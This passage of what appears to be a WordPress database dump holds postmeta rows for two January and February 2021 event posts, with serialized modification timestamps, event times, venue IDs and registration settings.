02:00:00'),(130647,263641,'_EventCost',''),(130620,263641,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611999484;s:12:\"_EventOrigin\";i:1611999484;s:13:\"_thumbnail_id\";i:1611999484;s:24:\"boldgrid_hide_page_title\";i:1611999484;s:17:\"_EventShowMapLink\";i:1611999484;s:13:\"_EventShowMap\";i:1611999484;s:15:\"_EventStartDate\";i:1611999484;s:13:\"_EventEndDate\";i:1611999484;s:18:\"_EventStartDateUTC\";i:1611999484;s:16:\"_EventEndDateUTC\";i:1611999484;s:14:\"_EventDuration\";i:1611999484;s:20:\"_EventCurrencySymbol\";i:1611999484;s:22:\"_EventCurrencyPosition\";i:1611999484;s:10:\"_EventCost\";i:1611999484;s:9:\"_EventURL\";i:1611999484;s:14:\"_EventTimezone\";i:1611999484;s:18:\"_EventTimezoneAbbr\";i:1611999484;s:27:\"_EventNextPendingRecurrence\";i:1611999484;s:26:\"_RTECregistrationsDisabled\";i:1611999484;s:17:\"_RTECdeadlineType\";i:1611999484;s:19:\"_RTECwhoCanRegister\";i:1611999484;s:23:\"_RTEClimitRegistrations\";i:1611999484;s:21:\"_RTECmaxRegistrations\";i:1611999484;s:16:\"_EventRecurrence\";i:1611999485;s:18:\"_RTECnumRegistered\";i:1611999485;s:13:\"_EventVenueID\";i:1611999485;s:12:\"_dp_original\";i:1611999485;s:16:\"tribe_events_cat\";i:1612024769;s:10:\"_edit_last\";i:1611999562;s:10:\"post_title\";i:1614199007;s:12:\"post_content\";i:1611999569;s:11:\"post_status\";i:1611999569;}'),(130641,263641,'_EventEndDate','2021-01-13 20:00:00'),(130648,263641,'_EventURL',''),(130649,263641,'_EventTimezone','America/Denver'),(130621,263641,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611999484;s:12:\"_EventOrigin\";i:1611999484;s:13:\"_thumbnail_id\";i:1611999484;s:24:\"boldgrid_hide_page_title\";i:1611999484;s:17:\"_EventShowMapLink\";i:1611999484;s:13:\"_EventShowMap\";i:1611999484;s:15:\"_EventStartDate\";i:1611999484;s:13:\"_EventEndDate\";i:1611999484;s:18:\"_EventStartDateUTC\";i:1611999484;s:16:\"_EventEndDateUTC\";i:1611999484;s:14:\"_EventDuration\";i:1611999484;s:20:\"_EventCurrencySymbol\";i:1611999484;s:22:\"_EventCurrencyPosition\";i:1611999484;s:10:\"_EventCost\";i:1611999484;s:9:\"_EventURL\";i:1611999484;s:14:\"_EventTimezone\";i:1611999484;s:18:\"_EventTimezoneAbbr\";i:1611999484;s:27:\"_EventNextPendingRecurrence\";i:1611999484;s:26:\"_RTECregistrationsDisabled\";i:1611999484;s:17:\"_RTECdeadlineType\";i:1611999484;s:19:\"_RTECwhoCanRegister\";i:1611999484;s:23:\"_RTEClimitRegistrations\";i:1611999484;s:21:\"_RTECmaxRegistrations\";i:1611999484;s:16:\"_EventRecurrence\";i:1611999485;s:18:\"_RTECnumRegistered\";i:1611999485;s:13:\"_EventVenueID\";i:1611999485;s:12:\"_dp_original\";i:1611999485;s:16:\"tribe_events_cat\";i:1612024769;s:10:\"_edit_last\";i:1611999562;s:10:\"post_title\";i:1614199007;s:12:\"post_content\";i:1611999569;s:11:\"post_status\";i:1611999569;}'),(130640,263641,'_EventStartDate','2021-01-13 19:00:00'),(130650,263641,'_EventTimezoneAbbr','MST'),(130622,263641,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611999484;s:12:\"_EventOrigin\";i:1611999484;s:13:\"_thumbnail_id\";i:1611999484;s:24:\"boldgrid_hide_page_title\";i:1611999484;s:17:\"_EventShowMapLink\";i:1611999484;s:13:\"_EventShowMap\";i:1611999484;s:15:\"_EventStartDate\";i:1611999484;s:13:\"_EventEndDate\";i:1611999484;s:18:\"_EventStartDateUTC\";i:1611999484;s:16:\"_EventEndDateUTC\";i:1611999484;s:14:\"_EventDuration\";i:1611999484;s:20:\"_EventCurrencySymbol\";i:1611999484;s:22:\"_EventCurrencyPosition\";i:1611999484;s:10:\"_EventCost\";i:1611999484;s:9:\"_EventURL\";i:1611999484;s:14:\"_EventTimezone\";i:1611999484;s:18:\"_EventTimezoneAbbr\";i:1611999484;s:27:\"_EventNextPendingRecurrence\";i:1611999484;s:26:\"_RTECregistrationsDisabled\";i:1611999484;s:17:\"_RTECdeadlineType\";i:1611999484;s:19:\"_RTECwhoCanRegister\";i:1611999484;s:23:\"_RTEClimitRegistrations\";i:1611999484;s:21:\"_RTECmaxRegistrations\";i:1611999484;s:16:\"_EventRecurrence\";i:1611999485;s:18:\"_RTECnumRegistered\";i:1611999485;s:13:\"_EventVenueID\";i:1611999485;s:12:\"_dp_original\";i:1611999485;s:16:\"tribe_events_cat\";i:1612024769;s:10:\"_edit_last\";i:1611999562;s:10:\"post_title\";i:1614199007;s:12:\"post_content\";i:1611999569;s:11:\"post_status\";i:1611999569;}'),(130639,263641,'_EventShowMap',''),(130651,263641,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(130623,263641,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611999484;s:12:\"_EventOrigin\";i:1611999484;s:13:\"_thumbnail_id\";i:1611999484;s:24:\"boldgrid_hide_page_title\";i:1611999484;s:17:\"_EventShowMapLink\";i:1611999484;s:13:\"_EventShowMap\";i:1611999484;s:15:\"_EventStartDate\";i:1611999484;s:13:\"_EventEndDate\";i:1611999484;s:18:\"_EventStartDateUTC\";i:1611999484;s:16:\"_EventEndDateUTC\";i:1611999484;s:14:\"_EventDuration\";i:1611999484;s:20:\"_EventCurrencySymbol\";i:1611999484;s:22:\"_EventCurrencyPosition\";i:1611999484;s:10:\"_EventCost\";i:1611999484;s:9:\"_EventURL\";i:1611999484;s:14:\"_EventTimezone\";i:1611999484;s:18:\"_EventTimezoneAbbr\";i:1611999484;s:27:\"_EventNextPendingRecurrence\";i:1611999484;s:26:\"_RTECregistrationsDisabled\";i:1611999484;s:17:\"_RTECdeadlineType\";i:1611999484;s:19:\"_RTECwhoCanRegister\";i:1611999484;s:23:\"_RTEClimitRegistrations\";i:1611999484;s:21:\"_RTECmaxRegistrations\";i:1611999484;s:16:\"_EventRecurrence\";i:1611999485;s:18:\"_RTECnumRegistered\";i:1611999485;s:13:\"_EventVenueID\";i:1611999485;s:12:\"_dp_original\";i:1611999485;s:16:\"tribe_events_cat\";i:1612024769;s:10:\"_edit_last\";i:1611999562;s:10:\"post_title\";i:1614199007;s:12:\"post_content\";i:1611999569;s:11:\"post_status\";i:1611999569;}'),(130638,263641,'_EventShowMapLink',''),(130652,263641,'_RTECregistrationsDisabled','1'),(130624,263641,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611999484;s:12:\"_EventOrigin\";i:1611999484;s:13:\"_thumbnail_id\";i:1611999484;s:24:\"boldgrid_hide_page_title\";i:1611999484;s:17:\"_EventShowMapLink\";i:1611999484;s:13:\"_EventShowMap\";i:1611999484;s:15:\"_EventStartDate\";i:1611999484;s:13:\"_EventEndDate\";i:1611999484;s:18:\"_EventStartDateUTC\";i:1611999484;s:16:\"_EventEndDateUTC\";i:1611999484;s:14:\"_EventDuration\";i:1611999484;s:20:\"_EventCurrencySymbol\";i:1611999484;s:22:\"_EventCurrencyPosition\";i:1611999484;s:10:\"_EventCost\";i:1611999484;s:9:\"_EventURL\";i:1611999484;s:14:\"_EventTimezone\";i:1611999484;s:18:\"_EventTimezoneAbbr\";i:1611999484;s:27:\"_EventNextPendingRecurrence\";i:1611999484;s:26:\"_RTECregistrationsDisabled\";i:1611999484;s:17:\"_RTECdeadlineType\";i:1611999484;s:19:\"_RTECwhoCanRegister\";i:1611999484;s:23:\"_RTEClimitRegistrations\";i:1611999484;s:21:\"_RTECmaxRegistrations\";i:1611999484;s:16:\"_EventRecurrence\";i:1611999485;s:18:\"_RTECnumRegistered\";i:1611999485;s:13:\"_EventVenueID\";i:1611999485;s:12:\"_dp_original\";i:1611999485;s:16:\"tribe_events_cat\";i:1612024769;s:10:\"_edit_last\";i:1611999562;s:10:\"post_title\";i:1614199007;s:12:\"post_content\";i:1611999569;s:11:\"post_status\";i:1611999569;}'),(130637,263641,'boldgrid_hide_page_title','0'),(130653,263641,'_RTECdeadlineType','start'),(130654,263641,'_RTECwhoCanRegister','any'),(130625,263641,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611999484;s:12:\"_EventOrigin\";i:1611999484;s:13:\"_thumbnail_id\";i:1611999484;s:24:\"boldgrid_hide_page_title\";i:1611999484;s:17:\"_EventShowMapLink\";i:1611999484;s:13:\"_EventShowMap\";i:1611999484;s:15:\"_EventStartDate\";i:1611999484;s:13:\"_EventEndDate\";i:1611999484;s:18:\"_EventStartDateUTC\";i:1611999484;s:16:\"_EventEndDateUTC\";i:1611999484;s:14:\"_EventDuration\";i:1611999484;s:20:\"_EventCurrencySymbol\";i:1611999484;s:22:\"_EventCurrencyPosition\";i:1611999484;s:10:\"_EventCost\";i:1611999484;s:9:\"_EventURL\";i:1611999484;s:14:\"_EventTimezone\";i:1611999484;s:18:\"_EventTimezoneAbbr\";i:1611999484;s:27:\"_EventNextPendingRecurrence\";i:1611999484;s:26:\"_RTECregistrationsDisabled\";i:1611999484;s:17:\"_RTECdeadlineType\";i:1611999484;s:19:\"_RTECwhoCanRegister\";i:1611999484;s:23:\"_RTEClimitRegistrations\";i:1611999484;s:21:\"_RTECmaxRegistrations\";i:1611999484;s:16:\"_EventRecurrence\";i:1611999485;s:18:\"_RTECnumRegistered\";i:1611999485;s:13:\"_EventVenueID\";i:1611999485;s:12:\"_dp_original\";i:1611999485;s:16:\"tribe_events_cat\";i:1612024769;s:10:\"_edit_last\";i:1611999562;s:10:\"post_title\";i:1614199007;s:12:\"post_content\";i:1611999569;s:11:\"post_status\";i:1611999569;}'),(130627,263641,'_EventOrigin','events-calendar'),(130628,263641,'_EventOrigin','events-calendar'),(130629,263641,'_EventOrigin','events-calendar'),(130630,263641,'_EventOrigin','events-calendar'),(130631,263641,'_EventOrigin','events-calendar'),(130632,263641,'_EventOrigin','events-calendar'),(130633,263641,'_EventOrigin','events-calendar'),(130634,263641,'_EventOrigin','events-calendar'),(130635,263641,'_EventOrigin','events-calendar'),(130636,263641,'_thumbnail_id','263178'),(130626,263641,'_EventOrigin','events-calendar'),(130655,263641,'_RTEClimitRegistrations','0'),(130656,263641,'_RTECmaxRegistrations','30'),(130657,263641,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(130658,263641,'_RTECnumRegistered','0'),(130659,263641,'_EventVenueID','262435'),(130661,263641,'_dp_original','263177'),(130662,263641,'_edit_lock','1619131121:2'),(130663,263641,'_edit_last','2'),(130677,263643,'protect_children',''),(130678,263643,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611999596;s:12:\"_EventOrigin\";i:1611999596;s:13:\"_thumbnail_id\";i:1612000222;s:24:\"boldgrid_hide_page_title\";i:1611999596;s:17:\"_EventShowMapLink\";i:1611999596;s:13:\"_EventShowMap\";i:1611999596;s:15:\"_EventStartDate\";i:1612000222;s:13:\"_EventEndDate\";i:1612000222;s:18:\"_EventStartDateUTC\";i:1612000222;s:16:\"_EventEndDateUTC\";i:1612000222;s:14:\"_EventDuration\";i:1611999596;s:20:\"_EventCurrencySymbol\";i:1611999596;s:22:\"_EventCurrencyPosition\";i:1611999596;s:10:\"_EventCost\";i:1611999596;s:9:\"_EventURL\";i:1611999596;s:14:\"_EventTimezone\";i:1611999596;s:18:\"_EventTimezoneAbbr\";i:1611999596;s:27:\"_EventNextPendingRecurrence\";i:1611999596;s:26:\"_RTECregistrationsDisabled\";i:1611999596;s:17:\"_RTECdeadlineType\";i:1611999596;s:19:\"_RTECwhoCanRegister\";i:1611999596;s:23:\"_RTEClimitRegistrations\";i:1611999596;s:21:\"_RTECmaxRegistrations\";i:1611999596;s:16:\"_EventRecurrence\";i:1611999596;s:18:\"_RTECnumRegistered\";i:1611999596;s:13:\"_EventVenueID\";i:1611999596;s:12:\"_dp_original\";i:1611999596;s:10:\"_edit_last\";i:1611999679;s:10:\"post_title\";i:1611999679;s:12:\"post_content\";i:1612000348;s:16:\"tribe_events_cat\";i:1612025547;s:11:\"post_status\";i:1612000222;}'),(130679,263643,'_EventOrigin','events-calendar'),(130680,263643,'protect_children',''),(130681,263643,'protect_children',''),(130682,263643,'protect_children',''),(130683,263643,'protect_children',''),(130684,263643,'protect_children',''),(130685,263643,'protect_children',''),(130686,263643,'protect_children',''),(130687,263643,'protect_children',''),(130688,263643,'protect_children',''),(130689,263643,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611999596;s:12:\"_EventOrigin\";i:1611999596;s:13:\"_thumbnail_id\";i:1612000222;s:24:\"boldgrid_hide_page_title\";i:1611999596;s:17:\"_EventShowMapLink\";i:1611999596;s:13:\"_EventShowMap\";i:1611999596;s:15:\"_EventStartDate\";i:1612000222;s:13:\"_EventEndDate\";i:1612000222;s:18:\"_EventStartDateUTC\";i:1612000222;s:16:\"_EventEndDateUTC\";i:1612000222;s:14:\"_EventDuration\";i:1611999596;s:20:\"_EventCurrencySymbol\";i:1611999596;s:22:\"_EventCurrencyPosition\";i:1611999596;s:10:\"_EventCost\";i:1611999596;s:9:\"_EventURL\";i:1611999596;s:14:\"_EventTimezone\";i:1611999596;s:18:\"_EventTimezoneAbbr\";i:1611999596;s:27:\"_EventNextPendingRecurrence\";i:1611999596;s:26:\"_RTECregistrationsDisabled\";i:1611999596;s:17:\"_RTECdeadlineType\";i:1611999596;s:19:\"_RTECwhoCanRegister\";i:1611999596;s:23:\"_RTEClimitRegistrations\";i:1611999596;s:21:\"_RTECmaxRegistrations\";i:1611999596;s:16:\"_EventRecurrence\";i:1611999596;s:18:\"_RTECnumRegistered\";i:1611999596;s:13:\"_EventVenueID\";i:1611999596;s:12:\"_dp_original\";i:1611999596;s:10:\"_edit_last\";i:1611999679;s:10:\"post_title\";i:1611999679;s:12:\"post_content\";i:1612000348;s:16:\"tribe_events_cat\";i:1612025547;s:11:\"post_status\";i:1612000222;}'),(130721,263643,'_EventCurrencyPosition','prefix'),(130690,263643,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611999596;s:12:\"_EventOrigin\";i:1611999596;s:13:\"_thumbnail_id\";i:1612000222;s:24:\"boldgrid_hide_page_title\";i:1611999596;s:17:\"_EventShowMapLink\";i:1611999596;s:13:\"_EventShowMap\";i:1611999596;s:15:\"_EventStartDate\";i:1612000222;s:13:\"_EventEndDate\";i:1612000222;s:18:\"_EventStartDateUTC\";i:1612000222;s:16:\"_EventEndDateUTC\";i:1612000222;s:14:\"_EventDuration\";i:1611999596;s:20:\"_EventCurrencySymbol\";i:1611999596;s:22:\"_EventCurrencyPosition\";i:1611999596;s:10:\"_EventCost\";i:1611999596;s:9:\"_EventURL\";i:1611999596;s:14:\"_EventTimezone\";i:1611999596;s:18:\"_EventTimezoneAbbr\";i:1611999596;s:27:\"_EventNextPendingRecurrence\";i:1611999596;s:26:\"_RTECregistrationsDisabled\";i:1611999596;s:17:\"_RTECdeadlineType\";i:1611999596;s:19:\"_RTECwhoCanRegister\";i:1611999596;s:23:\"_RTEClimitRegistrations\";i:1611999596;s:21:\"_RTECmaxRegistrations\";i:1611999596;s:16:\"_EventRecurrence\";i:1611999596;s:18:\"_RTECnumRegistered\";i:1611999596;s:13:\"_EventVenueID\";i:1611999596;s:12:\"_dp_original\";i:1611999596;s:10:\"_edit_last\";i:1611999679;s:10:\"post_title\";i:1611999679;s:12:\"post_content\";i:1612000348;s:16:\"tribe_events_cat\";i:1612025547;s:11:\"post_status\";i:1612000222;}'),(130720,263643,'_EventCurrencySymbol',''),(130691,263643,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611999596;s:12:\"_EventOrigin\";i:1611999596;s:13:\"_thumbnail_id\";i:1612000222;s:24:\"boldgrid_hide_page_title\";i:1611999596;s:17:\"_EventShowMapLink\";i:1611999596;s:13:\"_EventShowMap\";i:1611999596;s:15:\"_EventStartDate\";i:1612000222;s:13:\"_EventEndDate\";i:1612000222;s:18:\"_EventStartDateUTC\";i:1612000222;s:16:\"_EventEndDateUTC\";i:1612000222;s:14:\"_EventDuration\";i:1611999596;s:20:\"_EventCurrencySymbol\";i:1611999596;s:22:\"_EventCurrencyPosition\";i:1611999596;s:10:\"_EventCost\";i:1611999596;s:9:\"_EventURL\";i:1611999596;s:14:\"_EventTimezone\";i:1611999596;s:18:\"_EventTimezoneAbbr\";i:1611999596;s:27:\"_EventNextPendingRecurrence\";i:1611999596;s:26:\"_RTECregistrationsDisabled\";i:1611999596;s:17:\"_RTECdeadlineType\";i:1611999596;s:19:\"_RTECwhoCanRegister\";i:1611999596;s:23:\"_RTEClimitRegistrations\";i:1611999596;s:21:\"_RTECmaxRegistrations\";i:1611999596;s:16:\"_EventRecurrence\";i:1611999596;s:18:\"_RTECnumRegistered\";i:1611999596;s:13:\"_EventVenueID\";i:1611999596;s:12:\"_dp_original\";i:1611999596;s:10:\"_edit_last\";i:1611999679;s:10:\"post_title\";i:1611999679;s:12:\"post_content\";i:1612000348;s:16:\"tribe_events_cat\";i:1612025547;s:11:\"post_status\";i:1612000222;}'),(130719,263643,'_EventDuration','3600'),(130722,263643,'_EventCost',''),(130692,263643,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611999596;s:12:\"_EventOrigin\";i:1611999596;s:13:\"_thumbnail_id\";i:1612000222;s:24:\"boldgrid_hide_page_title\";i:1611999596;s:17:\"_EventShowMapLink\";i:1611999596;s:13:\"_EventShowMap\";i:1611999596;s:15:\"_EventStartDate\";i:1612000222;s:13:\"_EventEndDate\";i:1612000222;s:18:\"_EventStartDateUTC\";i:1612000222;s:16:\"_EventEndDateUTC\";i:1612000222;s:14:\"_EventDuration\";i:1611999596;s:20:\"_EventCurrencySymbol\";i:1611999596;s:22:\"_EventCurrencyPosition\";i:1611999596;s:10:\"_EventCost\";i:1611999596;s:9:\"_EventURL\";i:1611999596;s:14:\"_EventTimezone\";i:1611999596;s:18:\"_EventTimezoneAbbr\";i:1611999596;s:27:\"_EventNextPendingRecurrence\";i:1611999596;s:26:\"_RTECregistrationsDisabled\";i:1611999596;s:17:\"_RTECdeadlineType\";i:1611999596;s:19:\"_RTECwhoCanRegister\";i:1611999596;s:23:\"_RTEClimitRegistrations\";i:1611999596;s:21:\"_RTECmaxRegistrations\";i:1611999596;s:16:\"_EventRecurrence\";i:1611999596;s:18:\"_RTECnumRegistered\";i:1611999596;s:13:\"_EventVenueID\";i:1611999596;s:12:\"_dp_original\";i:1611999596;s:10:\"_edit_last\";i:1611999679;s:10:\"post_title\";i:1611999679;s:12:\"post_content\";i:1612000348;s:16:\"tribe_events_cat\";i:1612025547;s:11:\"post_status\";i:1612000222;}'),(130718,263643,'_EventEndDateUTC','2021-02-11 03:00:00'),(130693,263643,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611999596;s:12:\"_EventOrigin\";i:1611999596;s:13:\"_thumbnail_id\";i:1612000222;s:24:\"boldgrid_hide_page_title\";i:1611999596;s:17:\"_EventShowMapLink\";i:1611999596;s:13:\"_EventShowMap\";i:1611999596;s:15:\"_EventStartDate\";i:1612000222;s:13:\"_EventEndDate\";i:1612000222;s:18:\"_EventStartDateUTC\";i:1612000222;s:16:\"_EventEndDateUTC\";i:1612000222;s:14:\"_EventDuration\";i:1611999596;s:20:\"_EventCurrencySymbol\";i:1611999596;s:22:\"_EventCurrencyPosition\";i:1611999596;s:10:\"_EventCost\";i:1611999596;s:9:\"_EventURL\";i:1611999596;s:14:\"_EventTimezone\";i:1611999596;s:18:\"_EventTimezoneAbbr\";i:1611999596;s:27:\"_EventNextPendingRecurrence\";i:1611999596;s:26:\"_RTECregistrationsDisabled\";i:1611999596;s:17:\"_RTECdeadlineType\";i:1611999596;s:19:\"_RTECwhoCanRegister\";i:1611999596;s:23:\"_RTEClimitRegistrations\";i:1611999596;s:21:\"_RTECmaxRegistrations\";i:1611999596;s:16:\"_EventRecurrence\";i:1611999596;s:18:\"_RTECnumRegistered\";i:1611999596;s:13:\"_EventVenueID\";i:1611999596;s:12:\"_dp_original\";i:1611999596;s:10:\"_edit_last\";i:1611999679;s:10:\"post_title\";i:1611999679;s:12:\"post_content\";i:1612000348;s:16:\"tribe_events_cat\";i:1612025547;s:11:\"post_status\";i:1612000222;}'),(130717,263643,'_EventStartDateUTC','2021-02-11 02:00:00'),(130723,263643,'_EventURL',''),(130694,263643,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611999596;s:12:\"_EventOrigin\";i:1611999596;s:13:\"_thumbnail_id\";i:1612000222;s:24:\"boldgrid_hide_page_title\";i:1611999596;s:17:\"_EventShowMapLink\";i:1611999596;s:13:\"_EventShowMap\";i:1611999596;s:15:\"_EventStartDate\";i:1612000222;s:13:\"_EventEndDate\";i:1612000222;s:18:\"_EventStartDateUTC\";i:1612000222;s:16:\"_EventEndDateUTC\";i:1612000222;s:14:\"_EventDuration\";i:1611999596;s:20:\"_EventCurrencySymbol\";i:1611999596;s:22:\"_EventCurrencyPosition\";i:1611999596;s:10:\"_EventCost\";i:1611999596;s:9:\"_EventURL\";i:1611999596;s:14:\"_EventTimezone\";i:1611999596;s:18:\"_EventTimezoneAbbr\";i:1611999596;s:27:\"_EventNextPendingRecurrence\";i:1611999596;s:26:\"_RTECregistrationsDisabled\";i:1611999596;s:17:\"_RTECdeadlineType\";i:1611999596;s:19:\"_RTECwhoCanRegister\";i:1611999596;s:23:\"_RTEClimitRegistrations\";i:1611999596;s:21:\"_RTECmaxRegistrations\";i:1611999596;s:16:\"_EventRecurrence\";i:1611999596;s:18:\"_RTECnumRegistered\";i:1611999596;s:13:\"_EventVenueID\";i:1611999596;s:12:\"_dp_original\";i:1611999596;s:10:\"_edit_last\";i:1611999679;s:10:\"post_title\";i:1611999679;s:12:\"post_content\";i:1612000348;s:16:\"tribe_events_cat\";i:1612025547;s:11:\"post_status\";i:1612000222;}'),(130716,263643,'_EventEndDate','2021-02-10 20:00:00'),(130724,263643,'_EventTimezone','America/Denver'),(130695,263643,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611999596;s:12:\"_EventOrigin\";i:1611999596;s:13:\"_thumbnail_id\";i:1612000222;s:24:\"boldgrid_hide_page_title\";i:1611999596;s:17:\"_EventShowMapLink\";i:1611999596;s:13:\"_EventShowMap\";i:1611999596;s:15:\"_EventStartDate\";i:1612000222;s:13:\"_EventEndDate\";i:1612000222;s:18:\"_EventStartDateUTC\";i:1612000222;s:16:\"_EventEndDateUTC\";i:1612000222;s:14:\"_EventDuration\";i:1611999596;s:20:\"_EventCurrencySymbol\";i:1611999596;s:22:\"_EventCurrencyPosition\";i:1611999596;s:10:\"_EventCost\";i:1611999596;s:9:\"_EventURL\";i:1611999596;s:14:\"_EventTimezone\";i:1611999596;s:18:\"_EventTimezoneAbbr\";i:1611999596;s:27:\"_EventNextPendingRecurrence\";i:1611999596;s:26:\"_RTECregistrationsDisabled\";i:1611999596;s:17:\"_RTECdeadlineType\";i:1611999596;s:19:\"_RTECwhoCanRegister\";i:1611999596;s:23:\"_RTEClimitRegistrations\";i:1611999596;s:21:\"_RTECmaxRegistrations\";i:1611999596;s:16:\"_EventRecurrence\";i:1611999596;s:18:\"_RTECnumRegistered\";i:1611999596;s:13:\"_EventVenueID\";i:1611999596;s:12:\"_dp_original\";i:1611999596;s:10:\"_edit_last\";i:1611999679;s:10:\"post_title\";i:1611999679;s:12:\"post_content\";i:1612000348;s:16:\"tribe_events_cat\";i:1612025547;s:11:\"post_status\";i:1612000222;}'),(130715,263643,'_EventStartDate','2021-02-10 19:00:00'),(130725,263643,'_EventTimezoneAbbr','MST'),(130696,263643,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611999596;s:12:\"_EventOrigin\";i:1611999596;s:13:\"_thumbnail_id\";i:1612000222;s:24:\"boldgrid_hide_page_title\";i:1611999596;s:17:\"_EventShowMapLink\";i:1611999596;s:13:\"_EventShowMap\";i:1611999596;s:15:\"_EventStartDate\";i:1612000222;s:13:\"_EventEndDate\";i:1612000222;s:18:\"_EventStartDateUTC\";i:1612000222;s:16:\"_EventEndDateUTC\";i:1612000222;s:14:\"_EventDuration\";i:1611999596;s:20:\"_EventCurrencySymbol\";i:1611999596;s:22:\"_EventCurrencyPosition\";i:1611999596;s:10:\"_EventCost\";i:1611999596;s:9:\"_EventURL\";i:1611999596;s:14:\"_EventTimezone\";i:1611999596;s:18:\"_EventTimezoneAbbr\";i:1611999596;s:27:\"_EventNextPendingRecurrence\";i:1611999596;s:26:\"_RTECregistrationsDisabled\";i:1611999596;s:17:\"_RTECdeadlineType\";i:1611999596;s:19:\"_RTECwhoCanRegister\";i:1611999596;s:23:\"_RTEClimitRegistrations\";i:1611999596;s:21:\"_RTECmaxRegistrations\";i:1611999596;s:16:\"_EventRecurrence\";i:1611999596;s:18:\"_RTECnumRegistered\";i:1611999596;s:13:\"_EventVenueID\";i:1611999596;s:12:\"_dp_original\";i:1611999596;s:10:\"_edit_last\";i:1611999679;s:10:\"post_title\";i:1611999679;s:12:\"post_content\";i:1612000348;s:16:\"tribe_events_cat\";i:1612025547;s:11:\"post_status\";i:1612000222;}'),(130714,263643,'_EventShowMap',''),(130726,263643,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(130697,263643,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611999596;s:12:\"_EventOrigin\";i:1611999596;s:13:\"_thumbnail_id\";i:1612000222;s:24:\"boldgrid_hide_page_title\";i:1611999596;s:17:\"_EventShowMapLink\";i:1611999596;s:13:\"_EventShowMap\";i:1611999596;s:15:\"_EventStartDate\";i:1612000222;s:13:\"_EventEndDate\";i:1612000222;s:18:\"_EventStartDateUTC\";i:1612000222;s:16:\"_EventEndDateUTC\";i:1612000222;s:14:\"_EventDuration\";i:1611999596;s:20:\"_EventCurrencySymbol\";i:1611999596;s:22:\"_EventCurrencyPosition\";i:1611999596;s:10:\"_EventCost\";i:1611999596;s:9:\"_EventURL\";i:1611999596;s:14:\"_EventTimezone\";i:1611999596;s:18:\"_EventTimezoneAbbr\";i:1611999596;s:27:\"_EventNextPendingRecurrence\";i:1611999596;s:26:\"_RTECregistrationsDisabled\";i:1611999596;s:17:\"_RTECdeadlineType\";i:1611999596;s:19:\"_RTECwhoCanRegister\";i:1611999596;s:23:\"_RTEClimitRegistrations\";i:1611999596;s:21:\"_RTECmaxRegistrations\";i:1611999596;s:16:\"_EventRecurrence\";i:1611999596;s:18:\"_RTECnumRegistered\";i:1611999596;s:13:\"_EventVenueID\";i:1611999596;s:12:\"_dp_original\";i:1611999596;s:10:\"_edit_last\";i:1611999679;s:10:\"post_title\";i:1611999679;s:12:\"post_content\";i:1612000348;s:16:\"tribe_events_cat\";i:1612025547;s:11:\"post_status\";i:1612000222;}'),(130713,263643,'_EventShowMapLink',''),(130727,263643,'_RTECregistrationsDisabled','1'),(130728,263643,'_RTECdeadlineType','start'),(130698,263643,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611999596;s:12:\"_EventOrigin\";i:1611999596;s:13:\"_thumbnail_id\";i:1612000222;s:24:\"boldgrid_hide_page_title\";i:1611999596;s:17:\"_EventShowMapLink\";i:1611999596;s:13:\"_EventShowMap\";i:1611999596;s:15:\"_EventStartDate\";i:1612000222;s:13:\"_EventEndDate\";i:1612000222;s:18:\"_EventStartDateUTC\";i:1612000222;s:16:\"_EventEndDateUTC\";i:1612000222;s:14:\"_EventDuration\";i:1611999596;s:20:\"_EventCurrencySymbol\";i:1611999596;s:22:\"_EventCurrencyPosition\";i:1611999596;s:10:\"_EventCost\";i:1611999596;s:9:\"_EventURL\";i:1611999596;s:14:\"_EventTimezone\";i:1611999596;s:18:\"_EventTimezoneAbbr\";i:1611999596;s:27:\"_EventNextPendingRecurrence\";i:1611999596;s:26:\"_RTECregistrationsDisabled\";i:1611999596;s:17:\"_RTECdeadlineType\";i:1611999596;s:19:\"_RTECwhoCanRegister\";i:1611999596;s:23:\"_RTEClimitRegistrations\";i:1611999596;s:21:\"_RTECmaxRegistrations\";i:1611999596;s:16:\"_EventRecurrence\";i:1611999596;s:18:\"_RTECnumRegistered\";i:1611999596;s:13:\"_EventVenueID\";i:1611999596;s:12:\"_dp_original\";i:1611999596;s:10:\"_edit_last\";i:1611999679;s:10:\"post_title\";i:1611999679;s:12:\"post_content\";i:1612000348;s:16:\"tribe_events_cat\";i:1612025547;s:11:\"post_status\";i:1612000222;}'),(130712,263643,'boldgrid_hide_page_title','0'),(130729,263643,'_RTECwhoCanRegister','any'),(130699,263643,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611999596;s:12:\"_EventOrigin\";i:1611999596;s:13:\"_thumbnail_id\";i:1612000222;s:24:\"boldgrid_hide_page_title\";i:1611999596;s:17:\"_EventShowMapLink\";i:1611999596;s:13:\"_EventShowMap\";i:1611999596;s:15:\"_EventStartDate\";i:1612000222;s:13:\"_EventEndDate\";i:1612000222;s:18:\"_EventStartDateUTC\";i:1612000222;s:16:\"_EventEndDateUTC\";i:1612000222;s:14:\"_EventDuration\";i:1611999596;s:20:\"_EventCurrencySymbol\";i:1611999596;s:22:\"_EventCurrencyPosition\";i:1611999596;s:10:\"_EventCost\";i:1611999596;s:9:\"_EventURL\";i:1611999596;s:14:\"_EventTimezone\";i:1611999596;s:18:\"_EventTimezoneAbbr\";i:1611999596;s:27:\"_EventNextPendingRecurrence\";i:1611999596;s:26:\"_RTECregistrationsDisabled\";i:1611999596;s:17:\"_RTECdeadlineType\";i:1611999596;s:19:\"_RTECwhoCanRegister\";i:1611999596;s:2